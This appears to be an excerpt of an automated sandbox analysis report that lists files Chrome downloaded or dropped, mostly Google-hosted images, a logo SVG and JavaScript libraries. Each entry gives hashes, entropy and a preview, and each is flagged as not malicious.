                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8005
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.932879807851235
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:NqJV3s0+3afbOkpJYFOFrxRA9nvpvAk/RH+h80d4D:ET3KSbpoOFNRw6k/Rehxs
                                                                                                                                                                                                                                                                                          MD5:82F73E47F29A0B0B6EA0AC8A67419E3F
                                                                                                                                                                                                                                                                                          SHA1:CAD2C14184D3EB8CBF94E98EE178362F9D494169
                                                                                                                                                                                                                                                                                          SHA-256:A51842A1727B816A7D5B2C8666EAF8EC5F6C00A60972812E3DB65ED315FDEE77
                                                                                                                                                                                                                                                                                          SHA-512:2D25A171AC3A8496035E38E4E823DF6CBD8CE1C1FC89B36F13EF3E46F5831E1AFAF1D796488BCD70C3DD1D0A489FE6752C01C62225CDD2A321BB53BBC33C83B6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6....NeXIfMM.*.................>...........F.(.............................H.......H....o.#.....IDATx..y.l.U..k.sj.u.7.....=.q.1.p....ID...`....bA.%...# .(....DBB$..&)Q.K$ .;.!.......M......T.9g.....T.....k.R}OG...3}{.....'.......>....V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9..~.]..=..#.^.5"._..})"...^.a..Vp..;.....t.4..B0n.........@6.d..L.Q..!..hiL{..s.........`.`A...c.+..........#...-T<..1...!..$...:.6.a....qv..3m.......jK_,..M............kC.I.q.E....8.f.....5.....'....>.......Z...},"...M......7..c.^.....710....:D.k4.5......J.d.M..Y`I.d....%W.?r....O....9w.=f.z.{.}....k.j.8..%_zj.........8f.!..3X.~.....O..\...f......x.a....._J....H.@.".....B..@6-........p.........r...w....7i..]Y...=....ds.V.\...#....t..V.gr;.....O.......h.T.V.0...$..W..........W&b.I..y*......AZ.Y... Y`o.........!S.S4.$.p#.E<..=....L...'....r....L..a:I..&..;....z......Z
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2002
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.785694192036961
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:OrVGY7zdSfpppppgfCtYFgewzB0iRcnpppppy1ssvn/62a+DRgHdBxfxnBt3q3UR:GGY7ztCtYFgegBhcNsHf92pxDp0wAG8o
                                                                                                                                                                                                                                                                                          MD5:277569215A9A6E7C6B7553892F210CCB
                                                                                                                                                                                                                                                                                          SHA1:7A483FE9E0A54E1ADD9BA3684F1DE7CB92BB031A
                                                                                                                                                                                                                                                                                          SHA-256:4F65200DF0A0F28A9427FA0CCC75D604422BA6DC2487437032D068576058955F
                                                                                                                                                                                                                                                                                          SHA-512:5A6436A4EEBAC0D5CE458843EEAB33F24A5A5F194F4477A6BABA28FC15803DF79A43A07134D37D2276827137E99D3C0628B2474F874F0457A864E54C6B4D8167
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx...k..U.....EJki..0......bD#D%..4......X$.Z...T...c.....c"..`@CPATP.p..j ...B..^..EJ.p.x.....L......syv.{...sH$..D".#.....j...`.,.yO..ql..mh..$.#...q"^..p4.c..n(q/n.........H.;`8p..w..n.qM.o.}'.-3.. >..L....^...TN.[d8p...S6u....]R.b....3Q`QCMn.Gz}W..[C.'.1.x#>.9..Y....u*%..3.X*.=....yu*$...^....O...Z.p.. ...v,m......Ip....:.....U.&..r".....*.........9.\...L..c..OhTe/.R.`....0....Y.P.<.T.0%....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....G..;:.6)s{....?.6z|.7....].f...8.$J.#.G.t...S.U.....\Z.~....S.....M.en. ..!a..../...aT.*s/o/.n.f..9../...6....+....SVx...w.1....5......vR!uJ....2..;.l....[..:3/x..z'>.B....e>.....>..8..'.n..G}.$3-...x.........o...,...h....A..0..U1!.,-.Vg..Y.....vY9........8....Z..,..S.4dS....c.....s...m.....e...$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.e........{..w..Y.\3K4&x.s.UB.....a..1G.$W..7..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2222
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8730726200985295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:IUXAy0GN04/mwrWupfQzgLziuICrZrxUsIB8laSW7l3agXXoK:Oy0PwmYppfAgLziggsIGWP
                                                                                                                                                                                                                                                                                          MD5:A3419949626E50545681DB7C301C5D47
                                                                                                                                                                                                                                                                                          SHA1:1F4DE8632610E84482651EA0A8CB2ADCF70EBA86
                                                                                                                                                                                                                                                                                          SHA-256:2DF779D9557603350D38FC3357075048A1761A17CA2E9AA3586D07971D9BC2B6
                                                                                                                                                                                                                                                                                          SHA-512:8D9858BDAB6EAA8A6190BC8645267B44B81E07D6C0C5DBE3A628419BAE08051FEBE6FA47BFBD56062BA1273FE0D24E301952A89A2DD78B5306F48B9B122DA613
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....eIDATx.._.\U..?ww....J,..jb .Py.......35ML,e..m..@./...*..`.M.Z...B".vZ\hM...s.hP.,.!..5.K..X..vCwv...UZv.{.s...e{......g......`0.....`0.....`0....a.b...../...J...w.C.c&.....`u....m...k.."vR....(!<.c...`....k.J.....m.v.`.0.....h....skB..IjZX....*........4e.......V. .jV[+.2x./...BU..X.>...`H................4DK.9.,......X....I.. ..dk...6..7.y...oi..'r.[..Kt.D...!.=.G...k39FV?......L.g...\..X_...........R..x...X..^Z../....r.....].R.7y.*.|.#*u..._g,^(~.+....v....pr.......e.;^.Y......T........,../..\..s..]D.g.......K.6.L..SO../......nIi].t../......Wy..4w......e..%.jtz|..Yy]D.+...[C8*3....xq......%Ou.._..\.%..'.`..V.o...Sa.....a.....\..w.y.|E?#1.v,...nj%..:A.x.JkK)O......tQ.Y..`..C.gN....p. .....k.a..|....0...GEs.e..1...(......(L.......1..'Wn.[T[...V46|.. ..#...'.b.*;D.5e....(..b5. Wnm.^.Q%N......`9p]..!\/.....u....t}oC........q.>/...r..y`$jy.Xm.6D_...}.~@P+3..8m....B.....=,..E..I.6..Q..F,...N...&Q.x
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):813
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1177525812347575
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:tvCF61JzhgMgsbkCx0J8A9IKLkmbmtSqYzzfXFGtetUw/QOCUpM9YNrhykm:tZ1x0uwdqKL3bfqY9MetU6QeM9Y3Hm
                                                                                                                                                                                                                                                                                          MD5:E3598D780C8FF8607121797205734033
                                                                                                                                                                                                                                                                                          SHA1:631285F021305066437DB867C371AF1EC2E131E2
                                                                                                                                                                                                                                                                                          SHA-256:B95E30C771A3B8FCDF7ABCBC7A5C926D28ADD773E737742A64157406B5E0D973
                                                                                                                                                                                                                                                                                          SHA-512:21829FE3E70E1FF1E14643F062F212DC48A27234364AA2E477A4346B2AF8E9E536CED8673C1CECC31F623227189811EAEC00F58BE1EC7679956FA34D0532BAFF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/54/14/f309fb144b5ba381621867ee3ba8/eie.svg
                                                                                                                                                                                                                                                                                          Preview:<svg id="GoogleG_FullColor_rgb" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 24"><defs><style>.cls-1{fill:#4285f4;}.cls-2{fill:#34a853;}.cls-3{fill:#fabb05;}.cls-4{fill:#e94235;}</style></defs><title>GoogleG_FullColor_rgb_24px</title><g id="_24px" data-name="24px"><path class="cls-1" d="M23,12.27A14,14,0,0,0,22.81,10H12v4h6.09a6.75,6.75,0,0,1-2.36,4.09v3h3.79A11.87,11.87,0,0,0,23,12.27Z"/><path class="cls-2" d="M11.75,24a11.08,11.08,0,0,0,7.77-2.91l-3.79-3a6.94,6.94,0,0,1-4,1.16,7,7,0,0,1-6.59-5H1.26v3.09A11.72,11.72,0,0,0,11.75,24Z"/><path class="cls-3" d="M5.16,14.29a7.09,7.09,0,0,1,0-4.58V6.62H1.26a12.12,12.12,0,0,0,0,10.76Z"/><path class="cls-4" d="M11.75,4.75a6.33,6.33,0,0,1,4.51,1.8h0l3.35-3.42A11.15,11.15,0,0,0,11.75,0,11.72,11.72,0,0,0,1.26,6.62l3.9,3.09A7,7,0,0,1,11.75,4.75Z"/></g></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4073
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.92772253470979
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:SunauWhJa4yoBws7hY2lhu6gbDxh9u4RsiqNuXGbw2BAb:SuaBJooBw0hYMxg/9JRmcYwf
                                                                                                                                                                                                                                                                                          MD5:E5C929235F8F62A5D32C0C79F908D254
                                                                                                                                                                                                                                                                                          SHA1:DB829D0F15D091968B777862562734133A13CFB6
                                                                                                                                                                                                                                                                                          SHA-256:FC32AD718A8904720E20A4BA7302E4D0E1D8A8354B9F7D67875222CEB74B8EBD
                                                                                                                                                                                                                                                                                          SHA-512:450540743712825ACCD771E24B16D7974E2570FA1806F8304842052DAC0AA6918478C8072CB173E2EEA0B817946442E825F2005BB49A65147E14DE6FD19585F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{t....?........<......I...J.z..*.....S...............Z...............i..@"&..G0.........q.....0.sr8'.f........o~........................Ed:.;..G(....B0>.kI....7...0.O..Q...5....Z....c..A.L.2.n......NZ....\.<..8.pp..M..|....+...|5.Vc{...@...li.>Y..^N:.......4.qDF....3....,...gw.{:...j......Vl...R....E5.t.(...4.}5..@..L....P..,.t.?..V&...Bp(s...8......T<A...r..j..>;.}.z....U..\I.@.O...7O..y....Yu.{.....j.W".....T........#7.....Gm..j.......#2A.....*.9s..=N..9*..2..L......<[..../..s.!.=.+..\).G.......8..Q2..Bn....|e.>..FU.."su?.;....(y...R2QJJ>........q..a@e..&.Cr3..z.....jG.t.xH-.@..)\..-?{.k..P.i@e..".mQ......ox.3rO.x<.~.R<.~.{...z..(..<D...pM+..v\>.b..#......|.............O..l..=F+h.'...X!`.0..Y)....p...O.....P....P.@ok.....&.j....U.mW.. &...M1....0...SY#..;HA1..?.x..Q.~.aR.B.........T.n..=.$.<h......R..4...}...i..h.+Y.E.K!.e:.....m.x.o./..o......R.1.TAU.m..v.]..5....Z.R....-.....:.'m<.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (685)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):898
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.293332504092247
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XM+CVloofDDcfcE7VpuuAvauaj9PcU+W1YPcU+7ahU+x5R4gfHCcc3oZhS7KpvM+:8plJfDDcUE7Vpuha0wd9b+tzCcFsrm
                                                                                                                                                                                                                                                                                          MD5:2C32D27858C759A0D060AC348AE733A3
                                                                                                                                                                                                                                                                                          SHA1:6DF1F412D85F6B2B702BF062922A25AE3E02584E
                                                                                                                                                                                                                                                                                          SHA-256:E69D8D253D51A496E82B50254BC27589826C0E1A838E8BCE6BA328A91BB5C206
                                                                                                                                                                                                                                                                                          SHA-512:D71C3C8E50AC3417B3E8FDCB292A48263B56A18CC24AE9917F34433142386C3F009A4AC90A8C4B0D9C3564AC03D9F9F0375538D4AD0CAA2EB953C2DEC518E13D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as p,s as v,x as l}from"./ycaG4YXp.min.js";import{e as b}from"./0XPwTFcg.min.js";import{n as d}from"./IYoTYjYE.min.js";import{o as m}from"./5Ss99t85.min.js";const f=".container{width:9px;height:9px;border-radius:9px;--base-color: #3c4043;transition:box-shadow .2s ease-in-out}.container--active{border:1px solid var(--base-color);background:var(--base-color)}.container--inactive{border:1px solid var(--base-color);background:transparent}";var u=Object.defineProperty,x=Object.getOwnPropertyDescriptor,c=(s,e,a,o)=>{for(var r=o>1?void 0:o?x(e,a):e,i=s.length-1,n;i>=0;i--)(n=s[i])&&(r=(o?n(e,a,r):n(r))||r);return o&&r&&u(e,a,r),r};let t=class extends v{render(){return l`<div. class=${m({container:!0,"container--active":!!this.active,"container--inactive":!this.active})}. ></div>`}};t.styles=p(f);c([d({type:Boolean})],t.prototype,"active",2);t=c([b("bds-pagination-item")],t);.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 240x240, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2132
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.876983524213411
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:2bv0FWNl2dwKyq0oldB1FdFvS5nRSGhkjK3EmDRXTN:ITFKR9nz+R++X5
                                                                                                                                                                                                                                                                                          MD5:068E32A86688D3D97061DBDF5F4612CA
                                                                                                                                                                                                                                                                                          SHA1:AE6AA370F2AB728F4A53EA4E0404170F84498FE3
                                                                                                                                                                                                                                                                                          SHA-256:15ECCA7D07828AF29A84843B180D60A7984DC933CFD2A1BEFD22AA1179274EF0
                                                                                                                                                                                                                                                                                          SHA-512:E8B5CE44B544F94AE8BCFA7A0E8B23355930EE99698C9CC87A4CC6E3C9F209B48DAC0A90A755CFC843B1431F5851321D96E06514F99296CD5FC63FC344317960
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFL...WEBPVP8 @....0...*....>=..D.!..X.. ...p......=yUG.~0./....N...B...o..jo0.......I.Y.....+....P...z.}.?U}W..~.....~...~...........^...r.(../._...j......p....e.S.?...?....k....`O..z........[\..Nmv.X..`,......X..`,......9.X/..P.u{...HbE..*.-....^..X.@>...F/..N...y..`..RM._E}.E....D..0..........Od.#..._t..x.<L......P..(.W..b.......8C|..P.O.6.3...`*..3\.m....^.B..;k....`,......X..`,............$#.t@..M].0.X....:U..E.%m...F.m..]4_..)L.`H.1..`.N.0.-....f..lHb0....(.=.n.E....2...{.K..FC._Z.......!..Oy.Pm...qf.]...)...>.....in`.f.....J.......<2.....S.g..-.t1L.bg..N...ty%....u]..v.t..!m...#.R...V_.6..q......a.`F..?..l...I^.7..g..)..9.;-..#..8.....x2jt.7?.}I...qX%\..t..^o.|.b.[-...v....$./.W.:....j.z.D....:....tx~.LD#q...]1.....T..l......?...S....D.\......_;..&.Uxr..m...s..H&..4..o....tl).....j........$...eb...Jg.}eh..hW..f...e.....D.!...G.m..v.w.Q.n?.8.Y.t..o.S.j..G.....c..:.......T.bw3*/..XCq.Q>$W=.?.v...O.Y.~..1.L.3.?T..8Rt.i.=#f..9y...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (531)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):25735
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.32061556161217
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:n9CE/9AQJAklD7P2p+DVmzQaPl2sP1knouFxMuJMShSdI:n0G9AEDSp+DV6QatEnDFOQbwI
                                                                                                                                                                                                                                                                                          MD5:F3B164545693605300EB173A811DE92F
                                                                                                                                                                                                                                                                                          SHA1:8C76D4B0ED0709865089917A6D5C379F10DB5BE0
                                                                                                                                                                                                                                                                                          SHA-256:E60922EB1B304047E4DA82DE6ECB2C05FDF0ED01B4A9273064639558093BB0A2
                                                                                                                                                                                                                                                                                          SHA-512:1BE7EA840756FE546866DC8FF4C92D7294FB65863F564798DCD6B2E7B2E6EA8CC8FA00539330D1D543A65D79CF437DBD2348E5EFE72D496BF970D0DC16485319
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/angularjs/1.6.10/angular-animate.min.js
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(S,q){'use strict';function Ea(a,b,c){if(!a)throw Pa("areq",b||"?",c||"required");return a}function Fa(a,b){if(!a&&!b)return"";if(!a)return b;if(!b)return a;V(a)&&(a=a.join(" "));V(b)&&(b=b.join(" "));return a+" "+b}function Qa(a){var b={};a&&(a.to||a.from)&&(b.to=a.to,b.from=a.from);return b}function W(a,b,c){var d="";a=V(a)?a:a&&C(a)&&a.length?a.split(/\s+/):[];t(a,function(a,f){a&&0<a.length&&(d+=0<f?" ":"",d+=c?b+a:a+b)});return d}function Ga(a){if(a instanceof A)switch(a.length){case 0:return a;.case 1:if(1===a[0].nodeType)return a;break;default:return A(ua(a))}if(1===a.nodeType)return A(a)}function ua(a){if(!a[0])return a;for(var b=0;b<a.length;b++){var c=a[b];if(1===c.nodeType)return c}}function Ra(a,b,c){t(b,function(b){a.addClass(b,c)})}function Sa(a,b,c){t(b,function(b){a.removeClass(b,c)})}function X(a){return function(b,c){c.addClass&&(Ra(a,b,c.addClass),c.addClass=null);c.remov
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, orientation=upper-left], baseline, precision 8, 700x393, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):66025
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.966848272424233
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:h4YW1GGfTxtqnhYLf/VCWI66gt9Q4dgHceiXVc1N1CMk4:hnWtfynhYLfNCWn9OhpilcJC/4
                                                                                                                                                                                                                                                                                          MD5:66A9D7B104D1DF6791C122CD1C63114A
                                                                                                                                                                                                                                                                                          SHA1:56252C94EC0396E0EA1EC2050719C553687EFFC0
                                                                                                                                                                                                                                                                                          SHA-256:B16C1AFD9E08E4A09ABB87AF3B7601DD4053A4292ED98627018964F9948E46B1
                                                                                                                                                                                                                                                                                          SHA-512:901A020A1D0AC4079CC4AB9AD74289F0DDBE8CFBC3504A0F6934B82E331C17CDB7CF040C233E05205E54AA92D9B6AA3AA69DA821E41DFC86B2C56CAE38B4B211
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF.............@Exif..II*...................i.......&............................8Photoshop 3.0.8BIM........8BIM.%..................B~....ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=..U.xB...9.................................desc...D...ybXYZ........bTRC........dmdd........gXYZ...h....gTRC........lumi...|....meas.......$bkpt........rXYZ........rTRC........tech........vued........wtpt...p....cprt.......7chad.......,desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ......$.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|...............................................................%.+.2.8.>.E.L.R.Y.`.g.n.u.|.........................................&./.8.A.K.T.].g.q.z...............................!.-.8.C.O.Z.f.r.~......................... .-.;.H.U.c.q.~.......................+.:.I.X.g.w.....................'.7.H.Y.j.{..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3042
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.893880373562449
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:pH94yCKJQiPB5mCp++S5P0ejDduD0o8W9Ab4jcJKkQ3Ud7uxjUn82ugEZ3br4yh/:j/RrPB5zwlOvwo8Wz+Pog82+rD
                                                                                                                                                                                                                                                                                          MD5:A00F17187FA42F57B592304788AC6A30
                                                                                                                                                                                                                                                                                          SHA1:AD516D3B240E1A107572EABEB5F572F550086A28
                                                                                                                                                                                                                                                                                          SHA-256:12734F09D5293119E4C4373D3AD6B06BA282FC0199CFCC043CA6B029FA1C15B2
                                                                                                                                                                                                                                                                                          SHA-512:01AFA9F80A034C7AB612445E75F5CBE4C0F8AE4D10A94E38ACBC13442AFAA3F1D4B599BFD42332F3AC8410C20671CF059B940A720C86C6777EA3AF62D2F139AB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/BAwQk6jAMu2s_7Jh-8-_CsvSwEAaeLsVhL8z82VOoEkoaujxll1kYL3Pz4jkYpLbRpUA2fOZTtIppG2gXpsDoijSo1a1M5uPvke3=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{..U...[...] .0(.iS.d..0....)....".yW.h@@.A)...1.DE..e!6*Y.a."o...../......z.cv....gvM....;....3s.......p8.....p8.....p8.....p8......|e.O........@.a..9..$.A..).../..j)`60.X......)o.0>..<....L...........W..".....x....<.\...|.#u.......n.f.L`.....8G.....W..a|"p^.{=..;.D.\t........|~hK.4C.^F.D4q/p....2u4.8.g.7..).x]..v#..p.[..GW.t.....&.S.e.a..=H....:..81.J.w]UV.s..J...q........Z7.....k.i..o..q...wV.PG.D=...#N.)C.=.:.z.....jm..m.0>........e....e....#fX.e.=...8...f5.y..,)...........E.gZ.e.o[....j.OkH7p..`Q...@.._...x...e.u..ey_O.0....|D.....u{..,...j. va...8.g...n.`.al........K.@@..=.Z......I"(R|.@.w...\G,..].M.d.B.. .......0.......#(.(......|+.Qx..#....<" .......i.^.T.:.`?.xkC..............w.}....o.......G.TP..:..\..-."..i....q8a.....xIP.X..8...?.&.!....r.....|..~*..(.1SP~..?.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4110
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.904110883327691
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:gR5LOpTX9H3puQK3g30VrCFIUqtmxUrMn0PzfDyYIjUshvS8:0dORXHhig30J4IJmkIhq8
                                                                                                                                                                                                                                                                                          MD5:B0408DD73867E5962BF74022FD789013
                                                                                                                                                                                                                                                                                          SHA1:B020DE2C70933F75B3471AD9D6871AD056AB28B8
                                                                                                                                                                                                                                                                                          SHA-256:C734894408D819C9C692E3A850AD32B7C505491BB7744F379CECCF83C8FA3114
                                                                                                                                                                                                                                                                                          SHA-512:20C0FC2CFEA1D8DB3B5ACFB98083FF4983FC88434386AFF92B058460267F595E9ADE52D6971FA61CE2FD354B4AE1F2928FB398EEF89CF0A300744DEFE911E9CF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?.....$e...}.1...m#).....cF..@(..?#..1...k...f;F../..x.5......XkYk.9.9.c....x.$I.m...GB......m.[........X........0..JN.y.$...|OV.|..J.._..#2..h....l.....c....$5..Hw.&.L's.."..$....o....z.z.a.M.....Mh.G.Q'..i=..w#..72.w.w......oA.7.........&..K..>._.Y.....|...C."...Q.V+....f.sx......~...n....{'Wo<......N.O....p.p.x.{?.}z!.(...7G....H.Y..+.z9.l>).-.$[..+..Ns.4.....[o......w.TO8..dz..&..2.3.qiY...>....}+G.....Oc>+>.l.o&:.}...:y.(.xlF..)S-.iF.eY.W."..JF...kO)-...).%...RZ...9...eY..R.K:^..j^...i....D2.r.../.D...g..~...'..~.E..<..~...8._o.......oI...5.z..-........IUuY...%.jZ..j..L.B3.2..T.T...O..M_EV..H..M.6.......Y<...Q.n.'u.o.).....H\.t)>z.$......V..}l.....n..4/...J.~)._fu.n..o&.}..m.'9/.._.".f. ........'*.]T.).j.z.TU.r.5/....R.....7^&..!S.9..,.........".+'....!........d.|.,9.\.|..~w"...?...{rJ.+...._....IzL..|M.....C..g...{./!....Uj...n^....i.9%...$+..../.%....F.D...3.z....|...._O..I...?.......K?..O.,9.FT.E..a
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2848x1600, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):106902
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995515221047305
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:pT38kYxZLiU/1NkUJIgqvhpNnd6bT8nfrOM8njJX9EwafH2:JPYbXpJIgqlEaK7jh9ElfW
                                                                                                                                                                                                                                                                                          MD5:1BDB30622A6C90286E961A1B4EA31F38
                                                                                                                                                                                                                                                                                          SHA1:D0859DD71BCD5D3C864774CEBBF06B04A3DEE106
                                                                                                                                                                                                                                                                                          SHA-256:13FCBF02C3B1DDD2CAAF918E29E9F221885C087936553287E24B876E33C8FDD4
                                                                                                                                                                                                                                                                                          SHA-512:25786A450B32CC502D9F89E5939CFF647C84C41A2382F1B671623CB2899C7800A5C314998F5B4D59CB71C5E0BC4B8066E9922846624C80209F7BBD9615A89EB2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .........* .@.>m6.I.".*.W(.P..in.....?....1q8Gf.q.}#..[Q.{:...7.:.F.}F..W...O|.?N....='...Y...w.K......H.O/Y...~r....2`~M.'.......f...O.'......;..?....Y.o......-....._.../...>.............>n.w.../.?............_m.......'...?...............W._..:}.~...........O_.....~...........-@.j...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj...6...5S...V.y.*..Q.(Y..5i../a.j.U>(Y..5R.MZj...6...s)....S...)...J...5..lA..j;..! ._... vAV....|P..j.../........5i...,.v...q...5i.a.a.1...@.5. 6..`e5S..z...l;......,.v.%.)P6.....L.j.U>(Y.]|.T..i.MT..f.K .....O.-.5i....j..........5h..5,.g.$e..(<9...V...B.k.....XP.a.j.U@.....|P.a.j.N.9..O..l;W..j..@v...O..l;MZj....(....9.....XEx.f...|P.a.j.Y8.@.v.._..5S...V...6.m.BAV.....)...,.v...OQ..@l;MZ..vO...v.9..O..]5i...,.v..u,.}.2...R._.....V...B.i..2Ul l;MZj.@.v...O..l;MT.vAV...8..g......i....T..f.....8X..i.M;..SU>(Y..5i...,..:.xv...O..l;S"..a.){.r......5S..Z.o..*.|Y. ......V.> 7...L.....si.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 316
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):241
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.021158541798739
                                                                                                                                                                                                                                                                                          Encrypted:false
